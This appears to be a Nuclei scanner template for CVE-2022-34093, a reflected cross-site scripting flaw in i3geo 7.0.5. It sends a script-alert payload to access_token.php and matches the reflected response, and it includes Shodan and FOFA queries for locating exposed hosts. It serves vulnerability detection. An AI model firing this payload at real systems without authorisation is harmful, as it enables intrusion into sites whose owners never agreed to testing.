44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2022-34093
|
|
|
|
info:
|
|
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
|
|
- https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44
|
|
- https://owasp.org/www-community/attacks/xss/
|
|
- https://softwarepublico.gov.br/social/i3geo
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-34093
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00258
|
|
epss-percentile: 0.65535
|
|
cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: softwarepublico
|
|
product: i3geo
|
|
shodan-query: http.html:"i3geo"
|
|
fofa-query: body="i3geo"
|
|
tags: cve,cve2022,i3geo,xss,softwarepublico
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
|
|
condition: and
|
|
# digest: 4a0a00473045022100d8ab03284ce3101015e6cc8ba6bc61aa1905269e608b9dc08dcabcbd0dfaeb9c02202c7268c78cb7a7c34997055366784ac927cc98a49b4129332cac2acfb03ec527:922c64590222798bb761d5b6d8e72950 |